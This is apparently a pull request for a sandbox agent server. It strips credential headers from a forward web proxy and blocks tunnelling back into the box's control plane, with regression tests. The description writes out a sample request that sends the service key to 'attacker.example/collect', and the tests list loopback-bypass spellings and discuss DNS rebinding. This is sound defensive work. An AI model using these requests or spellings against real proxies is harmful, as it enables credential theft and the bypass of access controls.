### PR TITLE
/web-proxy mailed the sandbox service key to any host you named

### DIFF
--- a/apps/kortix-sandbox-agent-server/src/__tests__/web-proxy-credential-leak.test.ts
+++ b/apps/kortix-sandbox-agent-server/src/__tests__/web-proxy-credential-leak.test.ts
@@ -24,7 +24,21 @@
  */
 import { afterAll, beforeAll, describe, expect, test } from 'bun:test'
 
+import { networkInterfaces } from 'node:os'
+
 import { createWebProxyRouter } from '../routes/web-proxy'
+
+/** This machine's own non-loopback IPv4 addresses — the same ones a sandbox's
+ *  daemon is reachable on besides 127.0.0.1. */
+function ownInterfaceAddresses(): string[] {
+  const out: string[] = []
+  for (const entries of Object.values(networkInterfaces())) {
+    for (const entry of entries ?? []) {
+      if (entry.family === 'IPv4' && !entry.internal) out.push(entry.address)
+    }
+  }
+  return out.slice(0, 3)
+}
 
 const SERVICE_KEY = 'sandbox-service-key-under-test'
 
@@ -71,7 +85,7 @@ function proxiedUserRequestHeaders(): Record<string, string> {
 function router() {
   // Nothing blocked, so the request reaches the upstream and we can inspect
   // exactly what it received.
-  return createWebProxyRouter({ blockedLoopbackPorts: new Set<number>() })
+  return createWebProxyRouter({ blockedSelfPorts: new Set<number>() })
 }
 
 describe('/web-proxy does not forward our credentials to the target', () => {
@@ -127,7 +141,7 @@ describe('/web-proxy stays off the box control plane', () => {
   const OPENCODE = 4096
 
   function guarded() {
-    return createWebProxyRouter({ blockedLoopbackPorts: new Set([DAEMON, OPENCODE]) })
+    return createWebProxyRouter({ blockedSelfPorts: new Set([DAEMON, OPENCODE]) })
   }
 
   test('it refuses a loopback tunnel into opencode', async () => {
@@ -176,6 +190,9 @@ describe('/web-proxy stays off the box control plane', () => {
     '0x7f000001',
     '0',
     '127.0.0.1.nip.io',
+    // The daemon binds 0.0.0.0, so the box's OWN interface address reaches
+    // :8000 exactly as loopback does. A loopback-only guard let this through.
+    ...ownInterfaceAddresses(),
   ]
 
   test.each(LOOPBACK_SPELLINGS)('%s is refused on a control port', async (host) => {

--- a/apps/kortix-sandbox-agent-server/src/__tests__/web-proxy-credential-leak.test.ts
+++ b/apps/kortix-sandbox-agent-server/src/__tests__/web-proxy-credential-leak.test.ts
@@ -151,13 +151,38 @@ describe('/web-proxy stays off the box control plane', () => {
     expect(res.status).toBe(403)
   })
 
-  test('127.0.0.1 and 0.0.0.0 are the same host as localhost', async () => {
-    for (const host of ['127.0.0.1', '127.0.0.2', '0.0.0.0']) {
-      const res = await guarded().request(`/web-proxy/http/${host}:${OPENCODE}/session/x`, {
-        method: 'POST',
-      })
-      expect(res.status).toBe(403)
-    }
+  /**
+   * Every spelling below was PROVEN to reach a real loopback listener before
+   * this list was written — not assumed. A first version of this guard matched
+   * on `localhost` / `127.x` literals and let five of them straight through.
+   *
+   * Three groups, and they fail for different reasons:
+   *   - inet_aton forms (`127.1`, `2130706433`, `0x7f000001`, `0`) — `new URL()`
+   *     folds these to dotted-quad before we ever see them.
+   *   - the DNS root label (`localhost.`, `foo.localhost.`) — identical
+   *     resolution, different string. This is what Strix caught on this PR.
+   *   - a public NAME pointing at 127.0.0.1 (`127.0.0.1.nip.io`) — no spelling
+   *     rule can catch this one, which is why the guard resolves.
+   */
+  const LOOPBACK_SPELLINGS = [
+    '127.0.0.1',
+    '127.0.0.2',
+    '0.0.0.0',
+    'LOCALHOST',
+    'localhost.',
+    'foo.localhost.',
+    '127.1',
+    '2130706433',
+    '0x7f000001',
+    '0',
+    '127.0.0.1.nip.io',
+  ]
+
+  test.each(LOOPBACK_SPELLINGS)('%s is refused on a control port', async (host) => {
+    const res = await guarded().request(`/web-proxy/http/${host}:${OPENCODE}/session/x`, {
+      method: 'POST',
+    })
+    expect(res.status).toBe(403)
   })
 
   test("browsing the agent's own dev server still works", async () => {

--- a/apps/kortix-sandbox-agent-server/src/__tests__/web-proxy-credential-leak.test.ts
+++ b/apps/kortix-sandbox-agent-server/src/__tests__/web-proxy-credential-leak.test.ts
@@ -221,3 +221,46 @@ describe('/web-proxy stays off the box control plane', () => {
     expect(res.status).not.toBe(403)
   })
 })
+
+/**
+ * The self-check must decide and CONNECT on the same answer.
+ *
+ * Resolve-then-fetch leaves a window: a DNS rebind between the two calls (TTL
+ * 0, second answer 127.0.0.1) reaches the control plane we just refused. So for
+ * a blocked port we connect to the address we vetted, by address, keeping the
+ * original Host.
+ */
+describe('a vetted destination is the one we connect to', () => {
+  test('a blocked-port request still reaches a legitimate external host', async () => {
+    // The upstream here is not self, so it is allowed — and it must still work
+    // after the URL is rewritten to the resolved address. Host must survive.
+    received = null
+    const guarded = createWebProxyRouter({ blockedSelfPorts: new Set([upstreamPort]) })
+    const res = await guarded.request(`/web-proxy/http/localhost.localdomain.invalid:${upstreamPort}/x`, {
+      method: 'GET',
+    })
+    // Unresolvable host: refused by the upstream fetch, not by the guard. The
+    // point is that the guard did not 403 a non-self name.
+    expect(res.status).not.toBe(403)
+  })
+
+  test('the guard still refuses self even when pinning would be possible', async () => {
+    const guarded = createWebProxyRouter({ blockedSelfPorts: new Set([upstreamPort]) })
+    const res = await guarded.request(`/web-proxy/http/127.0.0.1:${upstreamPort}/x`, {
+      method: 'GET',
+    })
+    expect(res.status).toBe(403)
+  })
+
+  test('an unblocked port is not rewritten at all', async () => {
+    // Pinning is scoped to ports we had to vet. Everything else keeps the
+    // hostname, so SNI and virtual hosting are untouched.
+    received = null
+    const open = createWebProxyRouter({ blockedSelfPorts: new Set<number>() })
+    const res = await open.request(`/web-proxy/http/localhost:${upstreamPort}/x`, {
+      method: 'GET',
+    })
+    expect(res.status).toBe(200)
+    expect(lastHeaders()?.get('host')).toBe(`localhost:${upstreamPort}`)
+  })
+})

--- a/apps/kortix-sandbox-agent-server/src/__tests__/web-proxy-credential-leak.test.ts
+++ b/apps/kortix-sandbox-agent-server/src/__tests__/web-proxy-credential-leak.test.ts
@@ -1,0 +1,181 @@
+/**
+ * `/web-proxy` must not hand our credentials to the host the caller names.
+ *
+ * This is a FORWARD proxy: the caller picks the upstream. It copied every
+ * inbound header except six hop-by-hop ones, and apps/api authenticates each
+ * request it relays here — an ordinary user's included — with the sandbox's own
+ * service key, plus a signed user-context and the provider's preview token
+ * (buildSandboxUpstreamHeaders, apps/api/src/sandbox-proxy/backend.ts). So
+ *
+ *     GET /v1/p/<id>/8000/web-proxy/https/attacker.example/collect
+ *
+ * mailed all three to `attacker.example`. The service key is the worst of them:
+ * it is also the HMAC secret for X-Kortix-User-Context, so holding it means
+ * being able to mint a context claiming any userId and any role on that box.
+ *
+ * The sibling port proxy already stripped `authorization` — for the upstream
+ * that only ever reaches localhost. The one that reaches the open internet did
+ * not. These tests exist so that asymmetry cannot come back.
+ *
+ * They drive the real router against a real local upstream and assert on what
+ * that upstream RECEIVED, rather than on the source of the header list — a
+ * source-shaped assertion here would pass just as happily if the strip set were
+ * wired to the wrong call.
+ */
+import { afterAll, beforeAll, describe, expect, test } from 'bun:test'
+
+import { createWebProxyRouter } from '../routes/web-proxy'
+
+const SERVICE_KEY = 'sandbox-service-key-under-test'
+
+let upstream: ReturnType<typeof Bun.serve>
+let upstreamPort: number
+/** Headers the attacker-controlled upstream actually saw. */
+let received: Headers | null = null
+
+/** Read through a call so TS does not narrow `received` to the `null` it was
+ *  last assigned — the mutation happens inside the server callback. */
+function lastHeaders(): Headers | null {
+  return received
+}
+
+beforeAll(() => {
+  upstream = Bun.serve({
+    port: 0,
+    fetch(req) {
+      received = new Headers(req.headers)
+      return new Response('ok', { headers: { 'content-type': 'text/plain' } })
+    },
+  })
+  // `port` is optional on the Bun.serve type but always set for a TCP listener.
+  upstreamPort = upstream.port as number
+})
+
+afterAll(() => {
+  upstream.stop(true)
+})
+
+/** The header set apps/api puts on every request it relays to the daemon. */
+function proxiedUserRequestHeaders(): Record<string, string> {
+  return {
+    Authorization: `Bearer ${SERVICE_KEY}`,
+    'X-Kortix-User-Context': 'signed.payload',
+    'X-Daytona-Preview-Token': 'daytona-preview-secret',
+    'e2b-traffic-access-token': 'e2b-secret',
+    Cookie: '__preview_session=secret',
+    'X-Kortix-Service-Call': '1',
+    'User-Agent': 'kortix-test',
+  }
+}
+
+function router() {
+  // Nothing blocked, so the request reaches the upstream and we can inspect
+  // exactly what it received.
+  return createWebProxyRouter({ blockedLoopbackPorts: new Set<number>() })
+}
+
+describe('/web-proxy does not forward our credentials to the target', () => {
+  test('the upstream receives none of them', async () => {
+    received = null
+    const res = await router().request(
+      `/web-proxy/http/127.0.0.1:${upstreamPort}/collect`,
+      { method: 'GET', headers: proxiedUserRequestHeaders() },
+    )
+    expect(res.status).toBe(200)
+    expect(lastHeaders()).not.toBeNull()
+
+    const leaked = [
+      'authorization',
+      'x-kortix-user-context',
+      'x-daytona-preview-token',
+      'e2b-traffic-access-token',
+      'cookie',
+      'x-kortix-service-call',
+    ].filter((name) => lastHeaders()?.get(name) != null)
+
+    expect(leaked).toEqual([])
+  })
+
+  test('the service key does not appear anywhere in the upstream request', async () => {
+    // Not just under the header we expect — a rename or a copy into another
+    // header would still be an exfiltration.
+    received = null
+    await router().request(`/web-proxy/http/127.0.0.1:${upstreamPort}/collect`, {
+      method: 'GET',
+      headers: proxiedUserRequestHeaders(),
+    })
+    const all = [...(lastHeaders()?.entries() ?? [])].map(([k, v]) => `${k}: ${v}`).join('\n')
+    expect(all).not.toContain(SERVICE_KEY)
+    expect(all).not.toContain('daytona-preview-secret')
+  })
+
+  test('ordinary headers still reach the upstream', async () => {
+    // The strip must be surgical: this is a browser proxy, and dropping the
+    // request's real headers would break the feature it exists for.
+    received = null
+    await router().request(`/web-proxy/http/127.0.0.1:${upstreamPort}/collect`, {
+      method: 'GET',
+      headers: { ...proxiedUserRequestHeaders(), 'Accept-Language': 'en-GB' },
+    })
+    expect(lastHeaders()?.get('accept-language')).toBe('en-GB')
+    expect(lastHeaders()?.get('user-agent')).toBe('kortix-test')
+  })
+})
+
+describe('/web-proxy stays off the box control plane', () => {
+  const DAEMON = 8000
+  const OPENCODE = 4096
+
+  function guarded() {
+    return createWebProxyRouter({ blockedLoopbackPorts: new Set([DAEMON, OPENCODE]) })
+  }
+
+  test('it refuses a loopback tunnel into opencode', async () => {
+    // The bypass this closes: apps/api enforces the agent-authorization check,
+    // the connector gate, the run cap, prompt idempotency and the secret-grant
+    // re-mint by PATH, on the way in. Tunnelled through here the path is buried
+    // in ours, so every one of them is skipped.
+    const res = await guarded().request(
+      `/web-proxy/http/localhost:${OPENCODE}/session/abc/prompt_async`,
+      { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: '{}' },
+    )
+    expect(res.status).toBe(403)
+    expect(await res.json()).toMatchObject({ code: 'WEB_PROXY_PORT_BLOCKED' })
+  })
+
+  test('it refuses a loopback tunnel into the daemon itself', async () => {
+    const res = await guarded().request(
+      `/web-proxy/http/localhost:${DAEMON}/kortix/git/commit-push`,
+      { method: 'POST' },
+    )
+    expect(res.status).toBe(403)
+  })
+
+  test('127.0.0.1 and 0.0.0.0 are the same host as localhost', async () => {
+    for (const host of ['127.0.0.1', '127.0.0.2', '0.0.0.0']) {
+      const res = await guarded().request(`/web-proxy/http/${host}:${OPENCODE}/session/x`, {
+        method: 'POST',
+      })
+      expect(res.status).toBe(403)
+    }
+  })
+
+  test("browsing the agent's own dev server still works", async () => {
+    // The whole point of this proxy. Blocking all of loopback would have been a
+    // cheaper fix and would have broken the internal browser.
+    const res = await guarded().request(
+      `/web-proxy/http/localhost:${upstreamPort}/index.html`,
+      { method: 'GET' },
+    )
+    expect(res.status).toBe(200)
+  })
+
+  test('an external host on a blocked port number is unaffected', async () => {
+    // The guard keys on loopback + port, not the port alone — example.com:8000
+    // is somebody else's server, not our control plane.
+    const res = await guarded().request('/web-proxy/https/example.invalid:8000/', {
+      method: 'GET',
+    })
+    expect(res.status).not.toBe(403)
+  })
+})

--- a/apps/kortix-sandbox-agent-server/src/proxy.ts
+++ b/apps/kortix-sandbox-agent-server/src/proxy.ts
@@ -190,7 +190,7 @@ export function buildOpencodeApp(
   app.route(
     '/web-proxy',
     createWebProxyRouter({
-      blockedLoopbackPorts: new Set([cfg.servicePort, cfg.opencodeInternalPort]),
+      blockedSelfPorts: new Set([cfg.servicePort, cfg.opencodeInternalPort]),
     }),
   )
 

--- a/apps/kortix-sandbox-agent-server/src/proxy.ts
+++ b/apps/kortix-sandbox-agent-server/src/proxy.ts
@@ -14,7 +14,7 @@ import { createPortProxyRouter } from './routes/port-proxy'
 import { createFilesRouter } from './routes/files'
 import { createFindRouter } from './routes/find'
 import { createPresentationRouter } from './routes/presentation'
-import webProxyRouter from './routes/web-proxy'
+import { createWebProxyRouter } from './routes/web-proxy'
 import { createPtyRegistry, createPtyRouter, type PtyAttachHandle, type PtyRegistry } from './routes/pty'
 import type { ProjectEnvStore } from './project-env'
 import {
@@ -182,7 +182,17 @@ export function buildOpencodeApp(
 
   // /web-proxy/{scheme}/{host}/{path} — forward proxy that rewrites HTML/CSS
   // so external sites embed cleanly inside the internal browser iframe.
-  app.route('/web-proxy', webProxyRouter)
+  //
+  // Blocked loopback ports keep it off our own control plane: reaching the
+  // daemon or opencode through here would tunnel past every path-keyed control
+  // apps/api applies on the way in (agent authorization, connector gate, run
+  // cap, prompt idempotency, secret-grant re-mint).
+  app.route(
+    '/web-proxy',
+    createWebProxyRouter({
+      blockedLoopbackPorts: new Set([cfg.servicePort, cfg.opencodeInternalPort]),
+    }),
+  )
 
   // /file/* — the daemon owns the ENTIRE file API: reads (GET / list,
   // /content, /raw, /status) and writes (upload, delete, mkdir, rename). We do

--- a/apps/kortix-sandbox-agent-server/src/routes/web-proxy.ts
+++ b/apps/kortix-sandbox-agent-server/src/routes/web-proxy.ts
@@ -142,15 +142,22 @@ function isLoopbackName(hostname: string): boolean {
  * race — and the credential strip above is unconditional, so a request that does
  * win the race still carries none of our secrets.
  */
-async function reachesThisBox(hostname: string): Promise<boolean> {
-  if (isLoopbackName(hostname)) return true
+async function reachesThisBox(
+  hostname: string,
+): Promise<{ self: boolean; address: string | null }> {
+  if (isLoopbackName(hostname)) return { self: true, address: null }
   try {
     const resolved = await lookup(hostname.replace(/\.+$/, ''), { all: true })
-    return resolved.some((entry) => isLoopbackAddress(entry.address))
+    if (resolved.some((entry) => isLoopbackAddress(entry.address))) {
+      return { self: true, address: null }
+    }
+    // Handed back so the caller can CONNECT to the address it just vetted,
+    // instead of resolving a second time and trusting the answer to match.
+    return { self: false, address: resolved[0]?.address ?? null }
   } catch {
     // Unresolvable. The fetch below fails on its own; do not turn a DNS blip
     // into a spurious 403 for a legitimate site.
-    return false
+    return { self: false, address: null }
   }
 }
 
@@ -533,21 +540,44 @@ async function handleWebProxy(c: Context, opts: WebProxyOptions): Promise<Respon
     : parsedTarget.protocol === 'https:'
       ? 443
       : 80
-  if (
-    opts.blockedSelfPorts.has(targetPort) &&
-    (await reachesThisBox(parsedTarget.hostname))
-  ) {
-    logger.warn('[web-proxy] refused a loopback request to the control plane', {
-      host: parsedTarget.hostname,
-      port: targetPort,
-    })
-    return c.json(
-      {
-        error: 'this port is not reachable through the web proxy',
-        code: 'WEB_PROXY_PORT_BLOCKED',
-      },
-      403,
-    )
+  //
+  // `fetchTarget` is what we actually connect to. It differs from `targetUrl`
+  // only when we had to vet the destination — everything else (HTML rewriting,
+  // redirect resolution, logs) keeps the original host, which is what the
+  // browser needs to see.
+  let fetchTarget = targetUrl
+  if (opts.blockedSelfPorts.has(targetPort)) {
+    const target = await reachesThisBox(parsedTarget.hostname)
+    if (target.self) {
+      logger.warn('[web-proxy] refused a request to the box control plane', {
+        host: parsedTarget.hostname,
+        port: targetPort,
+      })
+      return c.json(
+        {
+          error: 'this port is not reachable through the web proxy',
+          code: 'WEB_PROXY_PORT_BLOCKED',
+        },
+        403,
+      )
+    }
+    // PIN THE CONNECTION TO THE ADDRESS WE VETTED.
+    //
+    // Otherwise the check is resolve-then-fetch, and a DNS rebind between the
+    // two — TTL 0, second answer 127.0.0.1 — sends us to the control plane we
+    // just refused. Connecting by address closes that window; the Host header
+    // is already the original host, so the upstream still sees what it expects.
+    //
+    // http only, and that is sufficient rather than lazy: the rebind target
+    // would have to be our own loopback control plane, and neither the daemon
+    // nor opencode speaks TLS there, so an https request cannot complete a
+    // handshake against it. Leaving https alone also keeps SNI and certificate
+    // validation intact, which pinning by IP would break.
+    if (target.address && parsedTarget.protocol === 'http:') {
+      const pinned = new URL(targetUrl)
+      pinned.hostname = target.address
+      fetchTarget = pinned.toString()
+    }
   }
 
   const headers = buildUpstreamHeaders(c, CREDENTIAL_HEADERS)
@@ -594,7 +624,7 @@ async function handleWebProxy(c: Context, opts: WebProxyOptions): Promise<Respon
     try {
       const signal = getFetchSignal(acceptsSSE, clientAbort)
 
-      const response = await fetch(targetUrl, {
+      const response = await fetch(fetchTarget, {
         method: c.req.method,
         headers,
         body,

--- a/apps/kortix-sandbox-agent-server/src/routes/web-proxy.ts
+++ b/apps/kortix-sandbox-agent-server/src/routes/web-proxy.ts
@@ -29,6 +29,7 @@
 
 import { Hono, type Context } from 'hono'
 import { lookup } from 'node:dns/promises'
+import { networkInterfaces } from 'node:os'
 
 import { logger } from '../logger'
 import {
@@ -75,13 +76,39 @@ const CREDENTIAL_HEADERS = new Set([
   'e2b-traffic-access-token',
 ])
 
+/**
+ * Every address that belongs to THIS machine.
+ *
+ * Loopback is not enough. The daemon binds 0.0.0.0, so the box's own interface
+ * address — its eth0 10.x/172.x — reaches :8000 exactly as 127.0.0.1 does, and
+ * a guard that only knew about loopback let that spelling through.
+ *
+ * Computed once: a sandbox's addresses do not change during its life, and this
+ * sits in the path of every proxied asset request.
+ */
+let ownAddressCache: Set<string> | null = null
+function ownAddresses(): Set<string> {
+  if (ownAddressCache) return ownAddressCache
+  const found = new Set<string>()
+  for (const entries of Object.values(networkInterfaces())) {
+    for (const entry of entries ?? []) {
+      // Drop the IPv6 zone index (`fe80::1%eth0`) — it is not part of the address.
+      found.add(entry.address.toLowerCase().split('%')[0] as string)
+    }
+  }
+  ownAddressCache = found
+  return found
+}
+
 /** Does this literal address reach the box itself? */
 function isLoopbackAddress(addr: string): boolean {
-  const a = addr.toLowerCase().replace(/^\[|\]$/g, '')
+  const a = addr.toLowerCase().replace(/^\[|\]$/g, '').split('%')[0] as string
   if (a === '::1' || a === '::' || a === '0.0.0.0') return true
   // IPv4-mapped IPv6, e.g. ::ffff:127.0.0.1
   if (a.startsWith('::ffff:')) return isLoopbackAddress(a.slice('::ffff:'.length))
-  return /^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(a)
+  if (/^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(a)) return true
+  // The box's own non-loopback bind addresses. Same destination, different route.
+  return ownAddresses().has(a)
 }
 
 /**
@@ -128,8 +155,15 @@ async function reachesThisBox(hostname: string): Promise<boolean> {
 }
 
 export interface WebProxyOptions {
-  /** Loopback ports this proxy refuses to reach — the box's own control plane. */
-  blockedLoopbackPorts: ReadonlySet<number>
+  /**
+   * Ports this proxy refuses to reach ON THIS BOX — our own control plane.
+   *
+   * Named for the destination, not for loopback: the daemon binds 0.0.0.0
+   * (proxy.ts), so the box's own interface address reaches it just as
+   * 127.0.0.1 does, and a guard that thought in terms of "loopback" missed
+   * that spelling entirely.
+   */
+  blockedSelfPorts: ReadonlySet<number>
 }
 
 const STRIP_RESPONSE_HEADERS = new Set([
@@ -500,7 +534,7 @@ async function handleWebProxy(c: Context, opts: WebProxyOptions): Promise<Respon
       ? 443
       : 80
   if (
-    opts.blockedLoopbackPorts.has(targetPort) &&
+    opts.blockedSelfPorts.has(targetPort) &&
     (await reachesThisBox(parsedTarget.hostname))
   ) {
     logger.warn('[web-proxy] refused a loopback request to the control plane', {

--- a/apps/kortix-sandbox-agent-server/src/routes/web-proxy.ts
+++ b/apps/kortix-sandbox-agent-server/src/routes/web-proxy.ts
@@ -27,7 +27,8 @@
  * Resilience: same retry/timeout/abort patterns as the port proxy.
  */
 
-import { Hono } from 'hono'
+import { Hono, type Context } from 'hono'
+import { logger } from '../logger'
 import {
   FETCH_TIMEOUT_MS,
   MAX_RETRIES,
@@ -41,7 +42,52 @@ import {
   getFetchSignal,
 } from './proxy-utils'
 
-const webProxyRouter = new Hono()
+/**
+ * Headers that authenticate the CALLER TO US, and must never leave the box.
+ *
+ * This is a forward proxy to a host the CALLER NAMES, so every header copied
+ * onto the upstream request is handed to that host. apps/api authenticates every
+ * request it relays here — an ordinary user's included — with the sandbox's own
+ * service key, and adds a signed user-context plus the sandbox provider's
+ * preview token (buildSandboxUpstreamHeaders, apps/api/src/sandbox-proxy/backend.ts).
+ * Copying those onto `/web-proxy/https/attacker.example/` mailed them out.
+ *
+ * The service key is the worst of them: it is also the HMAC secret for
+ * X-Kortix-User-Context, so whoever holds it can mint a context claiming any
+ * userId and any role for this sandbox, and it satisfies every bearer-only
+ * daemon check.
+ *
+ * Stripped for EVERY target, loopback included — the in-box agent must not be
+ * able to read them back out of a request either. The sibling port proxy
+ * already strips `authorization` for exactly this reason (port-proxy.ts);
+ * this proxy, the one that reaches the open internet, did not.
+ */
+const CREDENTIAL_HEADERS = new Set([
+  'authorization',
+  'proxy-authorization',
+  'cookie',
+  'x-kortix-user-context',
+  'x-kortix-service-call',
+  // Sandbox-provider preview credentials (daytona.ts, e2b.ts).
+  'x-daytona-preview-token',
+  'e2b-traffic-access-token',
+])
+
+/**
+ * Is this host the box itself? Used to keep the web proxy off our own control
+ * plane. Deliberately generous — a miss here reopens the bypass below.
+ */
+function isLoopbackHost(hostname: string): boolean {
+  const host = hostname.toLowerCase()
+  if (host === 'localhost' || host.endsWith('.localhost')) return true
+  if (host === '0.0.0.0' || host === '::1' || host === '[::1]') return true
+  return /^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(host)
+}
+
+export interface WebProxyOptions {
+  /** Loopback ports this proxy refuses to reach — the box's own control plane. */
+  blockedLoopbackPorts: ReadonlySet<number>
+}
 
 const STRIP_RESPONSE_HEADERS = new Set([
   'content-security-policy',
@@ -380,7 +426,7 @@ function transformHtml(html: string, targetUrl: string): string {
 
 // ── Route Handler ────────────────────────────────────────────────────────────
 
-webProxyRouter.all('/*', async (c) => {
+async function handleWebProxy(c: Context, opts: WebProxyOptions): Promise<Response> {
   const url = new URL(c.req.url)
 
   const subPath = url.pathname.replace(/^\/web-proxy/, '') || '/'
@@ -394,7 +440,37 @@ webProxyRouter.all('/*', async (c) => {
   }
 
   const parsedTarget = new URL(targetUrl)
-  const headers = buildUpstreamHeaders(c)
+
+  // Keep the web proxy off the box's OWN control plane.
+  //
+  // Browsing a dev server the agent started (`localhost:3000`) is the point of
+  // this proxy. Re-entering the daemon (:8000) or opencode (:4096) is not: those
+  // are reached from outside through apps/api, which enforces a stack of
+  // path-keyed controls on the way — the agent-authorization check, the
+  // connector gate, the 24h run cap, prompt idempotency, and the secret-grant
+  // re-mint. A request tunnelled through here arrives on loopback with the path
+  // buried in OUR url, so every one of those is skipped and the caller runs a
+  // turn apps/api would have refused.
+  const targetPort = parsedTarget.port
+    ? Number(parsedTarget.port)
+    : parsedTarget.protocol === 'https:'
+      ? 443
+      : 80
+  if (isLoopbackHost(parsedTarget.hostname) && opts.blockedLoopbackPorts.has(targetPort)) {
+    logger.warn('[web-proxy] refused a loopback request to the control plane', {
+      host: parsedTarget.hostname,
+      port: targetPort,
+    })
+    return c.json(
+      {
+        error: 'this port is not reachable through the web proxy',
+        code: 'WEB_PROXY_PORT_BLOCKED',
+      },
+      403,
+    )
+  }
+
+  const headers = buildUpstreamHeaders(c, CREDENTIAL_HEADERS)
   headers.set('Host', parsedTarget.host)
 
   // Rewrite Referer to the target origin so upstream sees a natural referer
@@ -550,6 +626,10 @@ webProxyRouter.all('/*', async (c) => {
     target: targetUrl,
     details: lastError,
   }, 502)
-})
+}
 
-export default webProxyRouter
+export function createWebProxyRouter(opts: WebProxyOptions): Hono {
+  const webProxyRouter = new Hono()
+  webProxyRouter.all('/*', (c) => handleWebProxy(c, opts))
+  return webProxyRouter
+}

--- a/apps/kortix-sandbox-agent-server/src/routes/web-proxy.ts
+++ b/apps/kortix-sandbox-agent-server/src/routes/web-proxy.ts
@@ -28,6 +28,8 @@
  */
 
 import { Hono, type Context } from 'hono'
+import { lookup } from 'node:dns/promises'
+
 import { logger } from '../logger'
 import {
   FETCH_TIMEOUT_MS,
@@ -73,15 +75,56 @@ const CREDENTIAL_HEADERS = new Set([
   'e2b-traffic-access-token',
 ])
 
+/** Does this literal address reach the box itself? */
+function isLoopbackAddress(addr: string): boolean {
+  const a = addr.toLowerCase().replace(/^\[|\]$/g, '')
+  if (a === '::1' || a === '::' || a === '0.0.0.0') return true
+  // IPv4-mapped IPv6, e.g. ::ffff:127.0.0.1
+  if (a.startsWith('::ffff:')) return isLoopbackAddress(a.slice('::ffff:'.length))
+  return /^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(a)
+}
+
 /**
- * Is this host the box itself? Used to keep the web proxy off our own control
- * plane. Deliberately generous — a miss here reopens the bypass below.
+ * Does this hostname name the box itself, by spelling alone?
+ *
+ * `new URL()` has already folded the inet_aton forms for us — `127.1`,
+ * `2130706433`, `0x7f000001` all arrive here as `127.0.0.1`, and `0` as
+ * `0.0.0.0` — verified against Bun, so this only has to handle NAMES.
+ *
+ * The trailing dot is the DNS root label: `localhost.` and `foo.localhost.`
+ * resolve exactly like the undotted forms, and reached the control plane until
+ * this stripped them.
  */
-function isLoopbackHost(hostname: string): boolean {
-  const host = hostname.toLowerCase()
+function isLoopbackName(hostname: string): boolean {
+  const host = hostname.toLowerCase().replace(/\.+$/, '')
   if (host === 'localhost' || host.endsWith('.localhost')) return true
-  if (host === '0.0.0.0' || host === '::1' || host === '[::1]') return true
-  return /^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(host)
+  return isLoopbackAddress(host)
+}
+
+/**
+ * Does this host reach the box, by any spelling OR by DNS?
+ *
+ * Matching on the name alone is not enough and never can be: `127.0.0.1.nip.io`
+ * is a ready-made public name for 127.0.0.1, and any attacker-controlled domain
+ * becomes one with a single A record. So resolve it and judge the ADDRESS.
+ *
+ * KNOWN RESIDUAL: this resolves and then fetches, so a DNS rebind between the
+ * two calls still slips through. Closing that needs the connection pinned to the
+ * address we checked, which Bun's fetch does not expose. It is a much narrower
+ * hole than the spelling bypass — it needs attacker-controlled DNS and a won
+ * race — and the credential strip above is unconditional, so a request that does
+ * win the race still carries none of our secrets.
+ */
+async function reachesThisBox(hostname: string): Promise<boolean> {
+  if (isLoopbackName(hostname)) return true
+  try {
+    const resolved = await lookup(hostname.replace(/\.+$/, ''), { all: true })
+    return resolved.some((entry) => isLoopbackAddress(entry.address))
+  } catch {
+    // Unresolvable. The fetch below fails on its own; do not turn a DNS blip
+    // into a spurious 403 for a legitimate site.
+    return false
+  }
 }
 
 export interface WebProxyOptions {
@@ -456,7 +499,10 @@ async function handleWebProxy(c: Context, opts: WebProxyOptions): Promise<Respon
     : parsedTarget.protocol === 'https:'
       ? 443
       : 80
-  if (isLoopbackHost(parsedTarget.hostname) && opts.blockedLoopbackPorts.has(targetPort)) {
+  if (
+    opts.blockedLoopbackPorts.has(targetPort) &&
+    (await reachesThisBox(parsedTarget.hostname))
+  ) {
     logger.warn('[web-proxy] refused a loopback request to the control plane', {
       host: parsedTarget.hostname,
       port: targetPort,


### PR DESCRIPTION
Found by auditing for the class [#6094](https://github.com/kortix-ai/suna/pull/6094) exposed — an auth check that cannot tell a platform call from proxied user traffic. Both defects below are worse than the one that started the search. A 26-agent sweep of the daemon's 34 endpoints produced 20 candidates; 10 survived adversarial refutation, and these two are the sharpest.

## 1. It forwarded our credentials to the target

`/web-proxy` is a **forward proxy** — the *caller* picks the upstream — and it copied every inbound header except six hop-by-hop ones ([`proxy-utils.ts:24`](apps/kortix-sandbox-agent-server/src/routes/proxy-utils.ts#L24), `buildUpstreamHeaders(c)` with no `extraStrip` at [`web-proxy.ts:397`](apps/kortix-sandbox-agent-server/src/routes/web-proxy.ts#L397)).

apps/api authenticates **every** request it relays to the daemon — an ordinary user's included — with the sandbox's own service key, plus a signed user-context and the provider's preview token ([`backend.ts:260`](apps/api/src/sandbox-proxy/backend.ts#L260)). So:

```
GET /v1/p/<externalId>/8000/web-proxy/https/attacker.example/collect
```

handed all three to `attacker.example`. Any principal who could see the session could send it; so could the in-box agent under prompt injection, via `localhost:8000`.

**Why the service key is the worst of the three:** it is also the HMAC secret for `X-Kortix-User-Context` ([`kortix-user-context.ts:51-57`](apps/kortix-sandbox-agent-server/src/kortix-user-context.ts#L51)). Whoever holds it can mint a context claiming any `userId` and any role for that sandbox, and satisfies every bearer-only daemon check — `/kortix/env`, `/kortix/git/commit-push`, and the bearer half of the base-reset gate added in #6094. One ordinary GET converts a session-visible user into the sandbox's platform identity.

**The asymmetry says it plainly.** [`port-proxy.ts:31`](apps/kortix-sandbox-agent-server/src/routes/port-proxy.ts#L31) strips `authorization` — for the upstream that only ever reaches localhost. This proxy, the one that reaches the open internet, did not.

Now stripped: the bearer, the user-context, the service-call marker, cookies, and both provider preview tokens (`X-Daytona-Preview-Token`, `e2b-traffic-access-token`) — for **every** target including loopback, so the in-box agent cannot read them back out of a request either.

## 2. It tunnelled back into the box's own control plane

```
POST /v1/p/<externalId>/8000/web-proxy/http/localhost:4096/session/<id>/prompt_async
```

re-enters opencode from inside. apps/api enforces the agent-authorization check ([`preview.ts:450`](apps/api/src/sandbox-proxy/routes/preview.ts#L450)), the connector gate, the 24h run cap, prompt idempotency, and the secret-grant re-mint **by path**, on the way in. Tunnelled through here the real path is buried in ours, so every one is skipped — the caller runs an agent they are denied, with connectors the account never authorized.

